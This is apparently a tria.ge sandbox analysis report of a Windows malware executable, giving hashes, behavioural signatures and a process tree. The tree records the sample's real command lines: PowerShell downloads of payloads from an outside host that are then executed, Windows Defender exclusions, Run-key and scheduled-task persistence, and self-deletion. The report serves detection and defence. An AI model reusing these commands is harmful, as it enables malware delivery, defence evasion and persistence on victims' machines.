Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    70s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/09/2022, 06:12

General

  • Target

    303359be5a96f2404af7e635640b257d.exe

  • Size

    138KB

  • MD5

    303359be5a96f2404af7e635640b257d

  • SHA1

    eed5a46a5605103022aee765c65b0edae9d33ebf

  • SHA256

    0670da9632a6639007d68c910a1bfdcca8ab9157324a65ce45bda3136f365a3c

  • SHA512

    526f035c53e3d5c6289f08dae106e8c955e83d1503a4bfd906e3f6997ee45f10cc942b55850e214036fbd560a568a3b4580eed4ad7d80977d2daa0e4681a00fc

  • SSDEEP

    3072:rw7s+ebZ7usUCAco7ILE0+50u+kKVzdCf/z8:rn+ebTUCAco7IZLYCZI/

Score
8/10

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe
    "C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4360
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4420
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
        3⤵
          PID:2656
    • C:\ProgramData\Google\unzip.exe
      "C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4332
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3680
        • C:\Windows\SysWOW64\netsh.exe
          netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
          3⤵
            PID:2448
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4788
          • C:\Windows\SysWOW64\netsh.exe
            netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
            3⤵
              PID:1116
        • C:\ProgramData\Google\unzip.exe
          "C:\ProgramData\Google\unzip.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Temp';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\GoogleUpdate.exe';Add-MpPreference -ExclusionProcess 'unzip.exe';Add-MpPreference -ExclusionProcess 'cmd.exe';Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'
          1⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4344
        • C:\ProgramData\Google\unzip.exe
          "C:\ProgramData\Google\unzip.exe" cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe";cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe"
          1⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4748
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3004
            • C:\Windows\SysWOW64\reg.exe
              reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
              3⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:376
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4312
            • C:\Windows\SysWOW64\reg.exe
              reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
              3⤵
              • Adds policy Run key to start application
              • Modifies registry key
              PID:2800
        • C:\ProgramData\Google\unzip.exe
          "C:\ProgramData\Google\unzip.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/obieznne.msi','C:\ProgramData\Google\software_reporter_tool.exe');C:\ProgramData\Google\software_reporter_tool.exe
          1⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4712
        • C:\ProgramData\Google\unzip.exe
          "C:\ProgramData\Google\unzip.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/cmd.msi','C:\ProgramData\Google\GoogleUpdate.exe');(New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/xmlo2.msi','C:\Windows\Temp\.xml');cmd.exe /c schtasks /create /xml "C:\Windows\Temp\.xml" /tn "GoogleUpdateTask";cmd.exe /c del "C:\Windows\Temp\.xml"
          1⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1352
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3192
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
              3⤵
              • Creates scheduled task(s)
              PID:5008
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml
            2⤵
              PID:2104

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\Google\unzip.exe

            Filesize

            423KB

            MD5

            c32ca4acfcc635ec1ea6ed8a34df5fac

            SHA1

            f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

            SHA256

            73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

            SHA512

            6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

          • C:\ProgramData\Google\unzip.exe

            Filesize

            423KB

            MD5

            c32ca4acfcc635ec1ea6ed8a34df5fac

            SHA1

            f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

            SHA256

            73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

            SHA512

            6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

          • C:\ProgramData\Google\unzip.exe

            Filesize

            423KB

            MD5

            c32ca4acfcc635ec1ea6ed8a34df5fac

            SHA1

            f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

            SHA256

            73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

            SHA512

            6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

          • C:\ProgramData\Google\unzip.exe

            Filesize

            423KB

            MD5

            c32ca4acfcc635ec1ea6ed8a34df5fac

            SHA1

            f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

            SHA256

            73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

            SHA512

            6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

          • C:\ProgramData\Google\unzip.exe

            Filesize

            423KB

            MD5

            c32ca4acfcc635ec1ea6ed8a34df5fac

            SHA1

            f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

            SHA256

            73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

            SHA512

            6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\unzip.exe.log

            Filesize

            1KB

            MD5

            33b19d75aa77114216dbc23f43b195e3

            SHA1

            36a6c3975e619e0c5232aa4f5b7dc1fec9525535

            SHA256

            b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

            SHA512

            676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            11KB

            MD5

            6f70bee5b4fdfe8bd6ad40dda95958bc

            SHA1

            4c93c522be8ce54fb6bc5a06591e2c575019fa54

            SHA256

            6c466d9e0b3b6df97dc26bfd895437ecb76578fa3ecf931f8afe45074f775557

            SHA512

            0e10c86877cb8f6bf3b80616f16376cb8cb0f51b3ba86dbd514e11e17973d81d7b63653fd6f523f19954fbd1c2dfa65d708cb4b0ef217cc59cd2f7f8d03fe55a

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            652B

            MD5

            463625693bec391366208ad1001bc278

            SHA1

            fa4778383968bc17ff1622bb5d6b6cf69bdc40da

            SHA256

            cb464bf4a3d693150bd03037fabbfa339ac3afa911fe90d7239885ad8ec62914

            SHA512

            19c1b19f4eb24f268de1bb71089d017be7295bde81247625ca8f010e0538fbbe73e0b80b25f0aaa69b366d156d1712a63d49df99aa2de02bdd4e7107fe6fc081

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            18KB

            MD5

            24e0a655c7d22ab9c6f673dc48b88dec

            SHA1

            41e66ecdb63d2a19392a33ddd8cca05db8974495

            SHA256

            744f0bb3357b13baae2f7ac0f5e4ba7daba3ea7a1ab8488da5c2924f6e0411af

            SHA512

            07e8fc4a72b9acd7203e9c4dfa792ac17fd749dda6738507d1ec2bd6994b7809f816ea64ee97430d5df66151da8bbc65a1f03751a75b42e61653721865e904ce

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            18KB

            MD5

            5fb3c65a3ebc7bc049aac5b6a3d92c1b

            SHA1

            aa0166b946bdf9e7ea19f81008cf7a7a200b8063

            SHA256

            809705808a35f5f7bb4eb4d506d2f9e9b31c3198f1ced0fc74f6faf47a76e14f

            SHA512

            9a7fa691c04c0bda84bb3c6709b30ae0a65d8ab09e9267f2fa44396075760a22a903d766e41834638d4e3a2e133a39b81fc71aef057ff4b3214242e15e2772bd

          • memory/1352-147-0x0000000005C50000-0x0000000005C6E000-memory.dmp

            Filesize

            120KB

          • memory/4344-167-0x0000000007E20000-0x0000000007E28000-memory.dmp

            Filesize

            32KB

          • memory/4344-154-0x00000000079C0000-0x00000000079F2000-memory.dmp

            Filesize

            200KB

          • memory/4344-155-0x00000000711C0000-0x000000007120C000-memory.dmp

            Filesize

            304KB

          • memory/4344-156-0x0000000006DC0000-0x0000000006DDE000-memory.dmp

            Filesize

            120KB

          • memory/4344-165-0x0000000007D30000-0x0000000007D3E000-memory.dmp

            Filesize

            56KB

          • memory/4344-166-0x0000000007E40000-0x0000000007E5A000-memory.dmp

            Filesize

            104KB

          • memory/4344-159-0x0000000007B80000-0x0000000007B8A000-memory.dmp

            Filesize

            40KB

          • memory/4344-146-0x0000000005950000-0x00000000059B6000-memory.dmp

            Filesize

            408KB

          • memory/4344-141-0x0000000005A00000-0x0000000006028000-memory.dmp

            Filesize

            6.2MB

          • memory/4344-162-0x0000000007D80000-0x0000000007E16000-memory.dmp

            Filesize

            600KB

          • memory/4360-142-0x00007FFA10A30000-0x00007FFA114F1000-memory.dmp

            Filesize

            10.8MB

          • memory/4360-132-0x000002E0D72A0000-0x000002E0D72C8000-memory.dmp

            Filesize

            160KB

          • memory/4360-135-0x00007FFA10A30000-0x00007FFA114F1000-memory.dmp

            Filesize

            10.8MB

          • memory/4712-153-0x00000000068B0000-0x00000000068CA000-memory.dmp

            Filesize

            104KB

          • memory/4712-152-0x0000000007A60000-0x00000000080DA000-memory.dmp

            Filesize

            6.5MB

          • memory/4712-145-0x00000000053A0000-0x0000000005406000-memory.dmp

            Filesize

            408KB

          • memory/4712-139-0x0000000002AA0000-0x0000000002AD6000-memory.dmp

            Filesize

            216KB

          • memory/4748-144-0x0000000005280000-0x00000000052A2000-memory.dmp

            Filesize

            136KB